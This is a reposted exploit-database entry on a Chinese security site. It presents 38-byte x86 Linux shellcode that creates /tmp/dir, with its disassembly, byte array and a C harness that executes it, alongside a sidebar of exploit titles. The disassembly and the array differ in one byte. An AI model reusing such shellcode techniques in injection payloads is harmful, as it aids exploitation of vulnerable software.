38 bytes sys_mkdir("/tmp/dir",1) x86 linux shellcode

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

38 bytes sys_mkdir("/tmp/dir",1) x86 linux shellcode

来源：devilzc0de.com 作者：gunslinger_ 发布时间：2010-06-01

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __ /'__`\        /\ \__ /'__`\                   0
0 /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \ _ ___           1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0 [+] Site            : Inj3ct0r.com                                  0
1 [+] Support e-mail : submit[at]inj3ct0r.com                        1
0                                                                      0
1               #########################################              1
0               I'm gunslinger_ member from Inj3ct0r Team              1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

/*
Name   : 38 bytes sys_mkdir("/tmp/dir",1) x86 linux shellcode
Date   : may, 31 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : devilzc0de.com
blog   : gunslingerc0de.wordpress.com
tested on : linux debian
*/

/*
gunslinger@localhost:~/shellcode$ objdump -d mkdir

mkdir: file format elf32-i386

Disassembly of section .text:

08048060 <.text>:
8048060: eb 17                jmp    0x8048079
8048062: 31 c0                xor    %eax,%eax
8048064: 31 db                xor    %ebx,%ebx
8048066: 31 d2                xor    %edx,%edx
8048068: 31 c9                xor    %ecx,%ecx
804806a: b0 27                mov    $0x27,%al
804806c: 5b                   pop    %ebx
804806d: b1 00                mov    $0x0,%cl
804806f: cd 80                int    $0x80
8048071: 31 c0                xor    %eax,%eax
8048073: b0 01                mov    $0x1,%al
8048075: 31 db                xor    %ebx,%ebx
8048077: cd 80                int    $0x80
8048079: e8 e4 ff ff ff       call   0x8048062
804807e: 2f                   das
804807f: 74 6d                je     0x80480ee
8048081: 70 2f                jo     0x80480b2
8048083: 64                   fs
8048084: 69                   .byte 0x69
8048085: 72                   .byte 0x72
gunslinger@localhost:~/shellcode$
*/

#include <stdio.h>

char shellcodedir[] =    "\xeb\x17"
    "\x31\xc0"
    "\x31\xdb"
    "\x31\xd2"
    "\x31\xc9"
    "\xb0\x27"
    "\x5b"
    "\xb1\x01"
    "\xcd\x80"
    "\x31\xc0"
    "\xb0\x01"
    "\x31\xdb"
    "\xcd\x80"
    "\xe8\xe4\xff\xff\xff"
    "\x2f"
    "\x74\x6d"
    "\x70\x2f"
    "\x64"
    "\x69"
    "\x72";

int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) shellcodedir;
(int)(*func)();
}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告